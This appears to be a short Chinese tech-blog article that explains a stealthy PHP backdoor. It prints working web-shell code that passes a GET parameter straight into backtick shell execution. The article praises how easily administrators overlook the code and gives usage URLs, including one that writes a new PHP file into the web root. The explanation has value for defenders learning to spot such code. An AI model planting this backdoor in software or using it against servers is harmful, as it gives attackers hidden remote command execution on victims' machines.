当前位置: 移动技术网 > IT编程>开发语言>PHP > 一个不易被发现的PHP后门代码解析

一个不易被发现的PHP后门代码解析

2019年03月21日  | 移动技术网IT编程  | 我要评论

偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的phper都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数。

伪装性很好,很容易被管理员忽略。

$selfnums = $_get['r'];
if (isset($selfnums)){
  echo `$selfnums`;
}

刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了,

而且又不是单引号,这个就是关键所在了,这个符号是 esc 下面的一个键(位于感叹号!旁边的),

通过 echo `系统命令`; 可以达到 system(); 一样的效果

如果不信的朋友可以测试

http://127.0.0.1/t.php?r=dir 可以列出目录

http://127.0.0.1/t.php?r=echo 我是马儿 >>d:\web\90sec.php

我用 appserv 和虚拟主机已经测试成功。

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
移动技术网